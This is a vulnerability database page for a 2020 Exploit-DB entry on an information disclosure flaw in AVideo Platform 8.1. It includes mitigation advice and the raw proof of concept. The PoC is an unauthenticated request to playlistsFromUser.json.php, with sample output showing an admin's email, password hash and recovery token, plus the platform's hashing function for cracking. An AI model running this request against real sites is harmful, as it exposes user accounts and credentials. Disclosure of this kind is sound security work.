AVideo Platform 8.1 - Information Disclosure (User Enumeration)

vendor:

AVideo Platform

by:

Ihsan Sencan

5.3

CVSS

MEDIUM

Information Disclosure (User Enumeration)

200

CWE

Product Name: AVideo Platform

Affected Version From: 8.1

Affected Version To: 8.1

Patch Exists: NO

Related CWE:

CPE: a:avideo_platform:avideo:8.1

Metasploit:

Other Scripts:

Platforms Tested: Linux

2020

AVideo Platform 8.1 – Information Disclosure (User Enumeration)

The AVideo Platform version 8.1 is vulnerable to an information disclosure vulnerability that allows an attacker to enumerate valid user accounts. By sending a GET request to the 'playlistsFromUser.json.php' endpoint with a valid 'users_id' parameter, an attacker can retrieve sensitive information such as user IDs, usernames, email addresses, passwords (hashed), creation and modification timestamps, and other user details. The vulnerability is due to insufficient access controls on the endpoint, which allows unauthorized users to access the information.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper access controls on the 'playlistsFromUser.json.php' endpoint. Only authorized users should be able to access sensitive user information. Additionally, it is advised to store passwords securely, using strong hashing algorithms and salted hashes. Regularly updating the AVideo Platform to the latest version is also recommended to ensure the latest security patches are applied.

Source

Exploit-DB raw data:

# Exploit Title: AVideo Platform 8.1 - Information Disclosure (User Enumeration)
# Dork: N/A
# Date: 2020-02-05
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://avideo.com
# Software Link: https://github.com/WWBN/AVideo
# Version: 8.1
# Tested on: Linux
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/objects/playlistsFromUser.json.php?users_id=[ID]
# 
................
0	
id	92
user	"admin"
name	"Watch Later"
email	"user@localhost"
password	"bc79a173cc20f0897db1c5b004588db9"
created	"2019-05-16 21:42:42"
modified	"2019-05-16 21:42:42"
isAdmin	1
status	"watch_later"
photoURL	"videos/userPhoto/photo1.png"
lastLogin	"2020-02-03 08:11:08"
recoverPass	"0ce70c7b006c78552fee993adeaafadf"
................
# 
# Hash function to be converted ....
# 
function encryptPassword($password, $noSalt = false) {
    global $advancedCustom, $global, $advancedCustomUser;
    if (!empty($advancedCustomUser->encryptPasswordsWithSalt) && !empty($global['salt']) && empty($noSalt)) {
        $password .= $global['salt'];
    }

    return md5(hash("whirlpool", sha1($password)));
}
#